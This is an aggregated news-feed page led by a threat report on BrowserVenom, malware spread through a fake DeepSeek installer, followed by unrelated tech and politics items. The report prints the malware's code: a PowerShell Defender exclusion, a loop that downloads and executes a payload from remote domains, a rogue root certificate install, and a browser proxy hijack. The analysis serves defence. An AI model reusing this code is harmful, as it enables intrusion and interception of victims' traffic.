Salta al contenuto principale



Toxic trend: Another malware threat targets DeepSeek



Introduction


DeepSeek-R1 is one of the most popular LLMs right now. Users of all experience levels look for chatbot websites on search engines, and threat actors have started abusing the popularity of LLMs. We previously reported attacks with malware being spread under the guise of DeepSeek to attract victims. The malicious domains spread through X posts and general browsing.

But lately, threat actors have begun using malvertising to exploit the demand for chatbots. For instance, we have recently discovered a new malicious campaign distributing previously unknown malware through a fake DeepSeek-R1 LLM environment installer. The malware is delivered via a phishing site that masquerades as the official DeepSeek homepage. The website was promoted in the search results via Google Ads. The attacks ultimately aim to install BrowserVenom, an implant that reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to manipulate the victim’s network traffic and collect data.

Phishing lure


The infection was launched from a phishing site, located at https[:]//deepseek-platform[.]com. It was spread via malvertising, intentionally placed as the top result when a user searched for “deepseek r1”, thus taking advantage of the model’s popularity. Once the user reaches the site, a check is performed to identify the victim’s operating system. If the user is running Windows, they will be presented with only one active button, “Try now”. We have also seen layouts for other operating systems with slight changes in wording, but all mislead the user into clicking the button.

Malicious website mimicking DeepSeek
Malicious website mimicking DeepSeek

Clicking this button will take the user to a CAPTCHA anti-bot screen. The code for this screen is obfuscated JavaScript, which performs a series of checks to make sure that the user is not a bot. We found other scripts on the same malicious domain signaling that this is not the first iteration of such campaigns. After successfully solving the CAPTCHA, the user is redirected to the proxy1.php URL path with a “Download now” button. Clicking that results in downloading the malicious installer named AI_Launcher_1.21.exe from the following URL: https://r1deepseek-ai[.]com/gg/cc/AI_Launcher_1.21.exe.

We examined the source code of both the phishing and distribution websites and discovered comments in Russian related to the websites’ functionality, which suggests that they are developed by Russian-speaking threat actors.

Malicious installer


The malicious installer AI_Launcher_1.21.exe is the launcher for the next-stage malware. Once this binary is executed, it opens a window that mimics a Cloudflare CAPTCHA.

The second fake CAPTCHA
The second fake CAPTCHA

This is another fake CAPTCHA that is loaded from https[:]//casoredkff[.]pro/captcha. After the checkbox is ticked, the URL is appended with /success, and the user is presented with the following screen, offering the options to download and install Ollama and LM Studio.

Two options to install abused LLM frameworks
Two options to install abused LLM frameworks

Clicking either of the “Install” buttons effectively downloads and executes the respective installer, but with a caveat: another function runs concurrently: MLInstaller.Runner.Run(). This function triggers the infectious part of the implant.
private async void lmBtn_Click(object sender, EventArgs e)
{
try
{
MainFrm.<>c__DisplayClass5_0 CS$<>8__locals1 = new MainFrm.<>c__DisplayClass5_0();
this.lmBtn.Text = "Downloading..";
this.lmBtn.Enabled = false;
Action action;
if ((action = MainFrm.<>O.<0>__Run) == null)
{
action = (MainFrm.<>O.<0>__Run = new Action(Runner.Run)); # <--- malware initialization
}
Task.Run(action);
CS$<>8__locals1.ollamaPath = Path.Combine(Path.GetTempPath(), "LM-Studio-0.3.9-6-x64.exe");
[...]
When the MLInstaller.Runner.Run() function is executed in a separate thread on the machine, the infection develops in the following three steps:

  1. First, the malicious function tries to exclude the user’s folder from Windows Defender’s protection by decrypting a buffer using the AES encryption algorithm.
    The AES encryption information is hardcoded in the implant:
    TypeAES-256-CBC
    Key01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20
    IV01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10

    The decrypted buffer contains a PowerShell command that performs the exclusion once executed by the malicious function.
    powershell.exe -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $USERPROFILE
    It should be noted that this command needs administrator privileges and will fail in case the user lacks them.

  2. After that, another PowerShell command runs, downloading an executable from a malicious domain whose name is derived with a simple domain generation algorithm (DGA). The downloaded executable is saved as %USERPROFILE%\Music\1.exe under the user’s profile and then executed.$ap = "/api/getFile?fn=lai.exe";
    $b = $null;
    foreach($i in 0..1000000) {
    $s = if ($i - gt 0) {
    $i
    } else {
    ""
    };
    $d = "https://app-updater$s.app$ap";
    $b = (New - Object Net.WebClient).DownloadData($d);
    if ($b) {
    break
    }

    };
    if ([Runtime.InteropServices.RuntimeEnvironment]::GetSystemVersion() - match"^v2") {
    [IO.File]::WriteAllBytes("$env:USERPROFILE\Music\1.exe", $b);
    Start - Process "$env:USERPROFILE\Music\1.exe" - NoNewWindow
    } else {
    ([Reflection.Assembly]::Load($b)).EntryPoint.Invoke($null, $null)
    }
    At the moment of our research, there was only one domain in existence: app-updater1[.]app. No binary can be downloaded from this domain as of now but we suspect that this might be another malicious implant, such as a backdoor for further access. So far, we have managed to obtain several malicious domain names associated with this threat; they are highlighted in the IoCs section.

  3. Then the MLInstaller.Runner.Run() function locates a hardcoded stage two payload in the class and variable ConfigFiles.load of the malicious installer’s buffer. This executable is decrypted with the same AES algorithm as before in order to be loaded into memory and run.


Loaded implant: BrowserVenom


We dubbed the next-stage implant BrowserVenom because it reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to sniff sensitive data and monitor the victim’s browsing activity while decrypting their traffic.

First, BrowserVenom checks if the current user has administrator rights – exiting if not – and installs a hardcoded certificate created by the threat actor:
[...]
X509Certificate2 x509Certificate = new X509Certificate2(Resources.cert);
if (RightsChecker.IsProcessRunningAsAdministrator())
{
StoreLocation storeLocation = StoreLocation.LocalMachine;
X509Store x509Store = new X509Store(StoreName.Root, storeLocation);
x509Store.Open(OpenFlags.ReadWrite);
x509Store.Add(x509Certificate);
[...]
Then the malware adds a hardcoded proxy server address to all currently installed and running browsers. For Chromium-based instances (i.e., Chrome or Microsoft Edge), it adds the proxy-server argument and modifies all existent LNK files, whereas for Gecko-based browsers, such as Mozilla or Tor Browser, the implant modifies the current user’s profile preferences:
[...]
new ChromeModifier(new string
[] {
"chrome.exe", "msedge.exe", "opera.exe", "brave.exe", "vivaldi.exe", "browser.exe", "torch.exe", "dragon.exe", "iron.exe", "epic.exe",
"blisk.exe", "colibri.exe", "centbrowser.exe", "maxthon.exe", "coccoc.exe", "slimjet.exe", "urbrowser.exe", "kiwi.exe"
}, string.Concat(new string
[] {
"--proxy-server=\"",
ProfileSettings.Host,
":",
ProfileSettings.Port,
"\""
})).ProcessShortcuts();
GeckoModifier.Modify();
[...]
The settings currently utilized by the malware are as follows:
public static readonly string Host = "141.105.130[.]106";
public static readonly string Port = "37121";
public static readonly string ID = "LauncherLM";
public static string HWID = ChromeModifier.RandomString(5);
The variables Host and Port are the ones used as the proxy settings, and the ID and HWID are appended to the browser’s User-Agent, possibly as a way to keep track of the victim’s network traffic.

Conclusion


As we have been reporting, DeepSeek has been the perfect lure for attackers to attract new victims. Threat actors’ use of new malicious tooling, such as BrowserVenom, complicates the detection of their activities. This, combined with the use of Google Ads to reach more victims and look more plausible, makes such campaigns even more effective.

At the time of our research, we detected multiple infections in Brazil, Cuba, Mexico, India, Nepal, South Africa, and Egypt. The nature of the bait and the geographic distribution of attacks indicate that campaigns like this continue to pose a global threat to unsuspecting users.

To protect against these attacks, users are advised to confirm that the results of their searches are official websites, along with their URLs and certificates, to make sure that the site is the right place to download the legitimate software from. Taking these precautions can help avoid this type of infection.

Kaspersky products detect this threat as HEUR:Trojan.Win32.Generic and Trojan.Win32.SelfDel.iwcv.

Indicators of Compromise

Hashes


d435a9a303a27c98d4e7afa157ab47de AI_Launcher_1.21.exe
dc08e0a005d64cc9e5b2fdd201f97fd6

Domains and IPs
deepseek-platform[.]comMain phishing site
r1deepseek-ai[.]comDistribution server
app-updater1[.]appStage #2 servers
app-updater2[.]app
app-updater[.]app
141.105.130[.]106Malicious proxy

securelist.com/browservenom-mi…

#2


Apple Intelligence ci riprova alla Wwdc 2025. Sarà la volta buona?

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Attesa al varco della Worldwide Developer Conference 2025 Apple concentra l'attenzione sul maquillage grafico del proprio sistema operativo con novità che la pongono in scia al rivale Android di Google.



Texas is about to ban all speech on campuses at night. Seriously.


Texas lawmakers trying to muzzle campus protests have just passed one of the most ridiculous anti-speech laws in the country, as Freedom of the Press Foundation senior adviser Caitlin Vogus explains in the Houston Chronicle.

A new bill, SB 2972, would require public universities in Texas to adopt policies prohibiting “engaging in expressive activities on campus between the hours of 10 p.m. and 8 a.m.” Expressive activity includes “any speech or expressive conduct” protected by the First Amendment or Texas Constitution.

As Vogus writes, Governor Greg Abbott “should veto this unconstitutional and absurd bill before Texas has to waste taxpayers’ money defending it. And Texans should find some time — preferably at night — to exercise their First Amendment right to question the competence of the legislators who wrote or supported this bill.”

Read the whole article here.


freedom.press/issues/texas-is-…



Why the EU’s GDPR ‘simplification’ reforms could unravel hard-won protections


Since it came into force almost seven years ago, the European Union (EU)'s General Data Protection Regulation (GDPR) has set the global standard for data protection. It empowers people to control their personal data while holding businesses accountable for how they collect, process, and store that data. One would imagine that all of the above would cement the GDPR, but this crucial law is being threatened by a push for profit at any cost.

The post Why the EU’s GDPR ‘simplification’ reforms could unravel hard-won protections appeared first on European Digital Rights (EDRi).

papapep reshared this.



Fighting spyware – Journalism, litigation and policy after the Pegasus Scandal


EDRi, ECNL and Lighthouse Reports are excited to launch a series of online sessions to facilitate collaboration and information sharing between journalists and civil society actors.

The post Fighting spyware – Journalism, litigation and policy after the Pegasus Scandal appeared first on European Digital Rights (EDRi).



Age Verification and the Future of Adult Content Regulation webinar


Join the Digital Intimacy Coalition for a timely and crucial conversation on the future of adult content regulation. This webinar brings together three experts from the worlds of law, tech policy, and porn production to unpack the complex consequences of current and proposed age verification mandates

The post Age Verification and the Future of Adult Content Regulation webinar appeared first on European Digital Rights (EDRi).



Le frontiere belliche dell’intelligenza artificiale


@Informatica (Italy e non Italy 😁)
L’invasione dell’Ucraina e il suo ecosistema tecnologico hanno creato le condizioni per lo sviluppo di sistemi militari di intelligenza artificiale che stanno cambiando il volto della guerra presente e futura.
L'articolo Le frontiere belliche dell’intelligenza artificiale proviene da Guerre di Rete.

L'articolo



Threaded Insert Press is 100% 3D Printed


Sometimes, when making a 3D printed object, plastic just isn’t enough. Probably the most common addition to our prints is the ubiquitous brass threaded inset, which has proven its worth time and again over the years in providing a secure screw attachment point with less hassle than a captive nut. Of course to insert these bits of machined brass, you need to press them in, and unless you’ve got a very good hand with a soldering iron it’s usually a good idea to use a press of some sort. [TimNummy] shows us that, ironically enough, making such a press is perfectly doable using only printed parts. Well, save for the soldering iron, of course.

He calls it the Superserter. Not only is it 100% printed plastic, but the entire design fits on a single 256 mm by 256 mm bed. In his case it was done on the Bambulab X1C, but it’s a common enough print bed size and can be printed without any supports. It’s even sized to fit the popular Gridfinity standard for a neat and tidy desk and handy bin placement for the inserts.

[TimNummy] clearly spent some time thinking about design for 3D printed manufacturing in order to create an assembly that does not need linear rails, sliders, or bearings as other press projects often do. The ironic thing is that if that same amount of effort went into other designs, it might eliminate the need for threaded inserts entirely.

If you haven’t delved into the world of threaded inserts, we put up a how-to-guide a few years ago. If you’re wondering if you can get away with just printing threads, the answer is “maybe”– we highlighted a video comparing printed threads with different inserts a while back to get you started thinking about the design limitations there.

youtube.com/embed/xoMrW3jdhm8?…


hackaday.com/2025/06/11/thread…



Arriva PathWiper! Il nuovo malware che devasta le infrastrutture critiche in Ucraina


Gli analisti di Cisco Talos hanno segnalato che le infrastrutture critiche in Ucraina sono state attaccate da un nuovo malware che distrugge i dati chiamato PathWiper. I ricercatori scrivono che il payload è stato distribuito tramite uno strumento di amministrazione degli endpoint legittimo, il che significa che gli aggressori avevano accesso amministrativo al sistema di destinazione in anticipo.

Gli esperti paragonano PathWiper a un altro malware distruttivo, HermeticWiper (noto anche come FoxBlade, KillDisk e NEARMISS), precedentemente distribuito in Ucraina dal gruppo Sandworm. Data la somiglianza di queste minacce, si presume che PathWiper possa essere una continuazione di HermeticWiper e che il malware venga utilizzato in attacchi contro cluster di minacce identici o sovrapposti.

PathWiper viene distribuito sui sistemi di destinazione tramite un file batch di Windows che esegue un VBScript dannoso (uacinstall.vbs), che a sua volta scarica ed esegue il payload principale (sha256sum.exe). Si noti che, per eludere il rilevamento durante l’esecuzione, il malware imita il comportamento e utilizza nomi associati a uno strumento di amministrazione legittimo.

Invece di elencare semplicemente le unità fisiche come fa HermeticWiper, PathWiper identifica programmaticamente tutte le unità connesse (locali, di rete, non montate). Il malware sfrutta quindi la capacità dell’API di Windows di smontare i volumi per prepararli alla distruzione e crea un thread separato per ciascun volume per sovrascrivere le strutture NTFS critiche, tra cui:

  • MBR (Master Boot Record) è il primo settore di un disco fisico, contenente il boot loader e la tabella delle partizioni;
  • $MFT (Master File Table) è il file di sistema NTFS principale che contiene una directory di tutti i file e le cartelle, inclusa la loro posizione sul disco e i metadati;
  • $LogFile: registro utilizzato per registrare le operazioni NTFS, tenere traccia delle modifiche ai file e verificare l’integrità e il ripristino dei dati;
  • $Boot è un file contenente informazioni sul settore di avvio e sul layout del file system.

PathWiper sovrascrive tutti i file NTFS critici con byte casuali, rendendo i sistemi di destinazione completamente inutilizzabili. Poiché gli attacchi studiati non comportavano estorsione o richieste finanziarie, gli esperti concludono che il loro unico obiettivo fosse distruggere dati e compromettere i sistemi.

Gli esperti concludono che PathWiper è l’ennesima aggiunta alla lista dei programmi che hanno preso di mira l’Ucraina negli ultimi anni, tra cui WhisperGate , WhisperKill , HermeticWiper , IsaacWiper , DoubleZero , CaddyWiper e AcidRain .

L'articolo Arriva PathWiper! Il nuovo malware che devasta le infrastrutture critiche in Ucraina proviene da il blog della sicurezza informatica.



Danimarca ’92 – Seconda puntata
freezonemagazine.com/rubriche/…
Come abbiamo visto nella prima parte, Richard Moeller Nielsen, commissario tecnico della nazionale di calcio danese, è chiamato a radunare in fretta e furia i suoi giocatori, ormai in procinto di partire per le ferie estive, per poter allestire la squadra che prenderà parte alla fase finale della nona edizione dei campionati europei di calcio, […]
L'articolo Danimarca ’92 – Seconda puntata



Bastian’s Night #429 June, 12th


Every Thursday of the week, Bastian’s Night is broadcast from 21:30 CET (new time).

Bastian’s Night is a live talk show in German with lots of music, a weekly round-up of news from around the world, and a glimpse into the host’s crazy week in the pirate movement aka Cabinet of Curiosities.


If you want to read more about @BastianBB: –> This way


piratesonair.net/bastians-nigh…




GRETA THUNBERG: “Noi rapiti da Israele. L’assalto alla Madleen è un crimine”


@Notizie dall'Italia e dal mondo
"Eravamo 12 volontari pacifici a bordo di una nave civile che trasportava aiuti umanitari in acque internazionali. Non abbiamo violato la legge. Non abbiamo fatto nulla di male", ha dichiarato ai giornalisti la giovane attivista svedese
L'articolo GRETA



E io che mi lamentavo della situazione italiana!




Did you know it’s not just two journalists who’ve been shot while covering the LA anti-ICE protests?

It’s many more. They appear to be targeting the press. Trying to silence them. Dissuade them from reporting on what is one of the most important issues America is facing.

Does the country want to submit to a fascist authoritarian?

Or do they want to fight back?

LA has chosen to fight back. And journalists are showing up to cover it. As they should.

Adam Rose is keeping a running tally on a thread on Bluesky. Highly recommend checking it out.

here’s some of the injured:

Ryanne Mena, shot with pepper balls

Sean Becker-Carmitchel, hit multiple times

Anthony Cabassa hit in face with chemical munition

Ryanne and Sean were hit again the next day, with a tear gas cannister

No name has been given but reports of someone from KTLA being hit with less lethal ammo and going to urgent care

Lauren Tomasi hit with less lethal ammo

Nick Stern shot with less lethal ammo and requires emergency surgery

These people were clearly identifying themselves as members of the press

They were there to do their jobs

And at least in the case of Lauren Tomasi, there’s video evidence which appears to show an officer taking clear aim and firing directly at her

Say their names.

Speak up.

The public need to know the risks the press are taking just to attempt to bring truth to the masses.

The Regime have been attempting to silence, sue and throttle the press since day one.

We shouldn’t tolerate any direct attacks on them.

#ice #abolishice #uspol #fascism #journalism #la #losangeles #resist




Le pasticche rosa di Grace
freezonemagazine.com/rubriche/…
Dietro le quinte del Festival di Woodstock la confusione è massima. Fuori cade una pioggia torrenziale su cinquecentomila ragazzi ammassati nel fango con poco da bere e da mangiare. Gli organizzatori del festival avevano stimato la presenza di 200.000 ragazzi e sono stati travolti dalla folla che in lunghe file ha raggiunto la fattoria di […]
L'articolo Le pasticche rosa di Grace proviene da FREE


Cosa faranno Nokia e Leonardo sulle reti wireless per le infrastrutture critiche (e non solo)

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Il gigante finlandese delle telecomunicazioni collabora con il colosso della difesa aerospazio italiano per fornire reti wireless private

reshared this



Back to the Future Lunchbox Cyberdeck


Back to the Future Lunchbox Cyberdeck

Our hacker [Valve Child] wrote in to let us know about his Back to the Future lunchbox cyberdeck.

Great Scott! This is so awesome. We’re not sure what we should say, or where we should begin. A lot of you wouldn’t have been there, on July 3rd, 1985, nearly forty years ago. But we were there. Oh yes, we were there. On that day the movie Back to the Future was released, along with the hit song from its soundtrack: Huey Lewis & The News – The Power Of Love.

Flux CapacitorFor the last forty years Back to the Future has been inspiring nerds and hackers everywhere with its themes of time-travel and technology. If you know what to look for you will find references to the movie throughout nerd culture. The OUTATIME number plate behind Dave Jones in the EEVblog videos? Back to the Future. The Flux Capacitor for sale at the Australian electronics store Jaycar? Back to the Future. The EEVblog 121GW Multimeter? Back to the Future. But it’s not just those kooky Australians, it’s all over the place including Rick and Morty, The Big Bang Theory, Ready Player One, Family Guy, The Simpsons, Futurama, Marvel’s Avengers: Endgame, LEGO Dimensions, and more.

As [Valve Child] explains he has built this cyberdeck for use on his work bench from a lunchbox gifted to him by his children last Christmas. His cyberdeck is based on the Raspberry Pi 5 and includes a cool looking and completely unnecessary water cooling system, a flux capacitor which houses the power supply, voltage and current meters, an OLED display for temperature and other telemetry, a bunch of lighting for that futuristic aesthetic, and a Bluetooth boombox for 80’s flair. Click through to watch the video demonstration of this delightfully detailed cyberdeck and if you want check out the extra photos too.

We ran a search for “Back to the Future” in the Hackaday archives and found 73 articles that mentioned the movie! Over the years we’ve riffed on hoverboards, calculator watches, the DeLorean, and the slick Mr. Fusion unit; and long may we continue.


hackaday.com/2025/06/10/back-t…



“Hack The System”: l’evento esclusivo sulla Cybersecurity dove assisterai a un attacco ransomware in diretta


2 Luglio 2025 | Siziano (PV) | Evento riservato a imprenditori, IT manager e professionisti della sicurezza
Nel panorama sempre più complesso della cybersecurity, capire davvero come avviene un attacco informatico e come difendersi non è mai stato così urgente.

Per questo nasce “Hack The System”, l’evento esclusivo organizzato da Omnia, in collaborazione con Red Hot Cyber e WithSecure, in programma il 2 luglio 2025 all’interno di un moderno datacenter Tier IV a Siziano (PV).

L’obiettivo: vedere per capire, proteggersi per tempo


Durante la mattinata, uno dei migliori ethical hacker italiani del team Hackerhood eseguirà una simulazione reale di attacco ransomware su un’infrastruttura composta da:

  • Domain Controller Windows
  • Server di posta Zimbra
  • SQL Server
  • Postazioni client

Lo scenario parte da un classico attacco di phishing, evolve con un’escalation di privilegi fino alla cifratura dei dati.

A seguire, verrà eseguita la stessa simulazione con l’EDR attivo, per dimostrare in diretta come una protezione moderna sia in grado di bloccare la propagazione del ransomware e mitigare l’attacco.

A chi è rivolto l’evento?


L’iniziativa è riservata e a numero chiuso (solo 40 posti disponibili): è pensata per imprenditori, general manager, IT manager, CISO e MSP che vogliono toccare con mano come si muove un attacco reale e quali soluzioni oggi rappresentano una difesa efficace.

Agenda della giornata


10:00 – 10:30 | Welcome Coffee & Networking
10:30 – 10:45 | Presentazione Omnia
10:45 – 11:00 | Presentazione WithSecure
11:00 – 13:00 | Live Hacking a cura di Hackerhood (RHC)
13:00 – 14:00 | Light Lunch & confronto con gli esperti
14:00 – 14:20 | Suite Elements: protezione completa proattiva
14:20 – 14:35 | Presentazione del Datacenter STACKMI01
14:35 – 15:15 | Tour esclusivo del Datacenter

Perché non puoi mancare?


  • Vedrai un attacco ransomware simulato in tempo reale, senza filtri
  • Capirai come proteggere davvero la tua azienda da minacce evolute
  • Scoprirai soluzioni concrete come l’EDR di WithSecure
  • Potrai confrontarti con esperti, pentester, bug hunter ed MSP
  • Vivrai un’esperienza immersiva e professionale all’interno di un vero datacenter produttivo

Registrazione obbligatoria – posti limitati
Prenota ora il tuo posto accedendo alla landing ufficiale dell’evento:
👉 bit.ly/4jHoKsS

L'articolo “Hack The System”: l’evento esclusivo sulla Cybersecurity dove assisterai a un attacco ransomware in diretta proviene da il blog della sicurezza informatica.



Gli Initial Access Broker minacciano la Sicurezza nazionale. Accesso al governo tunisino in vendita


Nel mondo sotterraneo della cybercriminalità, esistono figure meno note ma fondamentali per orchestrare attacchi di vasta scala: gli Initial Access Broker (IAB). A differenza dei gruppi ransomware o dei malware-as-a-service, gli IAB non colpiscono direttamente, ma forniscono l’accesso iniziale alle infrastrutture compromesse.

Sono i trafficanti di porte d’ingresso per tutto ciò che può venire dopo: furti di dati, ransomware, spionaggio.

Uno degli esempi più inquietanti è emerso di recente da un forum underground, dove l’utente DedSec ha messo in vendita una 0-day nei sistemi critici del governo tunisino, dichiarando apertamente: “Offro una 0day critico in un sistema governativo tunisino che garantisce accesso a quasi tutti i portali E-Government… DGI, CNSS, CNAM, poste, banche, settori militari.”

Il prezzo? Due milioni di dollari, con tanto di supporto incluso: un piano d’attacco già pronto per sfruttare la vulnerabilità.
Sto offrendo un 0day critico e di alto valore in un sistema governativo tunisino che contiene tutto ciò che si desidera, tranne la modifica di alcune cose come la modifica delle proprietà (ma è possibile se si scala). Questo include l'accesso a quasi tutti i portali di E-Government e, a seconda del portale e dei privilegi dell'utente, è possibile avviare richieste ufficiali, modificare dati, estrarre dati, accedere a conti bancari e altro ancora. Inoltre, come regalo da parte nostra, vi daremo un piano pronto per sfruttarlo.

Alcuni esempi di portali E-Gov:

l'Autorità fiscale tunisina (DGI), la Cassa nazionale di previdenza sociale (CNSS), la Cassa nazionale di assicurazione malattia (CNAM), le Poste tunisine, i settori dell'istruzione, le banche, alcuni settori militari e altro ancora.

Avvertenze: Non posso dire tutto ciò che si può ottenere (dati), ma tutto ciò che un utente o un cittadino tunisino in questi luoghi può fare e ancora una volta dipende dal luogo e dal privilegio che l'utente ha.

Non mostrerò alcuna prova né dirò alcuna informazione sul sistema finché non pagherete, allora la prova sarà la vuln. una volta che ne avrete verificato la validità, potremo continuare. Come ho detto, accetto gli intermediari, quindi non preoccupatevi dei vostri soldi.

Prezzo: $2M

E se lo vuoi solo per te stesso possiamo parlarne in pm.

IAB: chi sono e perché sono pericolosi


Gli Initial Access Broker sono intermediari criminali specializzati nel violare sistemi informatici per poi rivendere l’accesso ad altri attori malevoli. Questi ultimi possono essere:

  • gruppi ransomware,
  • agenti di minacce nazionali (APT),
  • criminali interessati a frodi bancarie,
  • truffatori specializzati in furti d’identità,
  • attori che cercano accesso persistente a infrastrutture critiche.

Un IAB non ha bisogno di sfruttare direttamente la falla. Il suo compito è quello di scovare la vulnerabilità, penetrarla silenziosamente, e poi metterla sul mercato. In molti casi, sfruttano vulnerabilità 0-day, cioè sconosciute anche ai fornitori di software. Nel caso del governo tunisino, DedSec afferma che con questa 0-day sia possibile:

  • estrarre dati da enti fiscali, previdenziali, educativi e sanitari,
  • accedere a conti bancari,
  • modificare dati personali,
  • presentare richieste ufficiali a nome di altri cittadini,
  • e persino accedere a settori militari sensibili.

La pericolosità non risiede solo nel danno economico o nella violazione della privacy, ma nel fatto che questo tipo di accesso potrebbe essere usato da attori geopolitici per destabilizzare intere nazioni.

L’importanza della Cyber Threat Intelligence (CTI)


È proprio in scenari come questo che la Cyber Threat Intelligence diventa essenziale. Le CTI permettono a governi e aziende di:

  • intercettare post nei forum underground come quello di DedSec,
  • monitorare la vendita di exploit o accessi,
  • riconoscere pattern ricorrenti tra IAB,
  • valutare il rischio reale prima che gli exploit vengano utilizzati,
  • allertare i CERT nazionali e mitigare la vulnerabilità prima che sia troppo tardi.

Una CTI efficace consente non solo di reagire, ma di prevenire, evitando che un accesso iniziale diventi un attacco su larga scala. La figura degli Initial Access Broker è spesso invisibile al grande pubblico, ma rappresenta la miccia che accende il fuoco. In un contesto dove una vulnerabilità venduta per 2 milioni di dollari può compromettere l’intera infrastruttura digitale di uno Stato, la minaccia non può più essere sottovalutata.

La difesa non può più essere reattiva.

Serve intelligence, monitoraggio costante e collaborazione internazionale. Prima che l’accesso diventi un attacco.

L'articolo Gli Initial Access Broker minacciano la Sicurezza nazionale. Accesso al governo tunisino in vendita proviene da il blog della sicurezza informatica.



Estensioni Chrome sotto accusa: gravi falle mettono a rischio milioni di utenti


Gli analisti di Symantec hanno identificato gravi vulnerabilità in diverse estensioni di Google Chrome, che minacciano la privacy e la sicurezza degli utenti. I problemi riguardano la trasmissione di dati sensibili tramite un protocollo HTTP non protetto e la presenza di segreti hard-coded nel codice delle estensioni.

Secondo il ricercatore Yuanjing Guo del team Symantec, diverse estensioni ampiamente utilizzate trasmettono involontariamente dati sensibili tramite una connessione HTTP non protetta. Questi dati includono domini dei siti visitati, identificativi dei dispositivi, informazioni sul sistema operativo, analisi dell’utilizzo e persino informazioni sull’eventuale rimozione dell’estensione. Tutto ciò viene trasmesso in chiaro, senza crittografia. Poiché il traffico non è protetto, è vulnerabile agli attacchi Adversary-in-the-Middle (AitM).

Gli aggressori sulla stessa rete, ad esempio su una rete Wi-Fi pubblica, possono non solo intercettare le informazioni trasmesse, ma anche modificarle, il che può portare a conseguenze più gravi. L’elenco delle estensioni non sicure include:

  • SEMRush Rank e PI Rank : accedi all’indirizzo tramite HTTP rank.trellian[.]com;
  • Browsec VPN : quando si rimuove l’estensione, invia una richiesta tramite HTTP a browsec-uninstall.s3-website.eu-central-1.amazonaws[.]com;
  • MSN Nuova scheda e MSN Homepage, Bing Search e News : trasmettono identificatori univoci del dispositivo a g.ceipmsn[.]com;
  • DualSafe Password Manager : trasferisce le statistiche di utilizzo, la versione dell’estensione e la lingua del browser in stats.itopupdate[.]com.

Sebbene non siano state rilevate perdite dirette di password, il fatto che il gestore delle password invii dati di telemetria tramite una connessione non protetta mina la fiducia nella sua affidabilità. Symantec ha anche identificato un altro gruppo di estensioni che codificano direttamente chiavi API, token e segreti. Questi dati possono essere utilizzati dagli aggressori per creare richieste dannose e condurre attacchi.

Tra questi:

  • AVG Online Security , Speed ​​Dial [FVD] , SellerSprite : contengono un segreto hard-coded di Google Analytics 4 (GA4), con il cui aiuto è possibile distorcere le metriche;
  • Equatio – contiene la chiave Microsoft Azure utilizzata per il riconoscimento vocale;
  • Awesome Screen Recorder e Scrolling Screenshot Tool : la chiave sviluppatore AWS per caricare screenshot sullo storage S3;
  • Microsoft Editor : utilizza una chiave di telemetria StatsApiKeyper raccogliere analisi;
  • Antidote Connector : utilizza una libreria di terze parti, InboxSDK, con chiavi API codificate. La stessa libreria è utilizzata in oltre 90 altre estensioni, i cui nomi non sono divulgati;
  • Watch2Gether , Trust Wallet , TravelArrow : contengono rispettivamente le chiavi pubbliche per le API Tenor, Ramp Network e ip-api.

Gli aggressori che ottengono l’accesso a queste chiavi possono falsificare la telemetria, simulare transazioni di criptovaluta, pubblicare contenuti proibiti e aumentare i costi degli sviluppatori per le chiamate API. Gli esperti sottolineano: da GA4 ad Azure, da AWS a Ramp, poche righe di codice non protetto possono compromettere un intero servizio. La soluzione è non archiviare dati sensibili lato client e utilizzare solo canali di comunicazione sicuri.

Si consiglia agli utenti di rimuovere le estensioni non sicure finché gli sviluppatori non elimineranno le chiamate tramite un protocollo non protetto. Il traffico trasparente non è una minaccia astratta: può essere facilmente intercettato e utilizzato per phishing, sorveglianza e attacchi mirati. Anche un’elevata popolarità e un marchio riconoscibile non garantiscono il rispetto dei principi di sicurezza di base. Le estensioni devono essere verificate in base ai protocolli utilizzati e alla natura delle informazioni trasmesse: solo questo può garantire una reale protezione dei dati.

L'articolo Estensioni Chrome sotto accusa: gravi falle mettono a rischio milioni di utenti proviene da il blog della sicurezza informatica.



Nel frattempo, nella civilissima Reggio Emilia...

[accade spesso, tanto che diverse compagnie di noleggio hanno lasciato la città]



What Marie Curie Left Behind


It is a good bet that if most scientists and engineers were honest, they would most like to leave something behind that future generations would remember. While Marie Curie met that standard — she was the first woman to win the Nobel prize because of her work with radioactivity, and a unit of radioactivity (yes, we know — not the SI unit) is a Curie. However, Curie also left something else behind inadvertently: radioactive residue. As the BBC explains, science detectives are retracing her steps and facing some difficult decisions about what to do with contaminated historical artifacts.

Marie was born in Poland and worked in Paris. Much of the lab she shared with her husband is contaminated with radioactive material transferred by the Curies’ handling of things like radium with their bare hands.

Some of the traces have been known for years, including some on the lab notebooks the two scientists shared. However, they are still finding contamination, including at her family home, presumably brought in from the lab.

There is some debate about whether all the contamination is actually from Marie. Her daughter, Irène, also used the office. The entire story starts when Marie realized that radioactive pitchblende contained uranium and thorium, but was more radioactive than those two elements when they were extracted. The plan was to extract all the uranium and thorium from a sample, leaving this mystery element.

It was a solid plan, but working in a store room and, later, a shed with no ventilation and handling materials bare-handed wasn’t a great idea. They did isolate two elements: polonium (named after Marie’s birth country) and radium. Research eventually proved fatal as Marie succumbed to leukemia, probably due to other work she did with X-rays. She and her husband are now in Paris’ Pantheon, in lead-lined coffins, just in case.

If you want a quick video tour of the museum, [Sem Wonders] has a video you can see, below. If you didn’t know about the Curie’s scientist daughter, we can help you with that. Meanwhile, you shouldn’t be drinking radium.

youtube.com/embed/Js2mFBrCoRU?…


hackaday.com/2025/06/10/what-m…



Sunday Party Conference Schedule


Our Spring 2025 conference is this Sunday, June 15th in the Lavender Room at Arts at the Armory, 191 Highland Ave., Somerville. The conference starts at 10am and ends by 4pm.

Schedule

Our conference schedule and session descriptions.

TimeSessionSpeaker
9:00am – 10:00amSetup
10:00am – 10:15amOpening Address
10:15am – 11:15amPolicy and Platform Discussion
11:15am – noonMonopoly Free CapitalismWendy Welsh
noon – 12:30pmLunch and protecting your privacy hands on
12:30pm – 1:00pmHow to navigate your local governmentSteve Revilak
1:00pm – 1:45pmReview of Party Initiatives
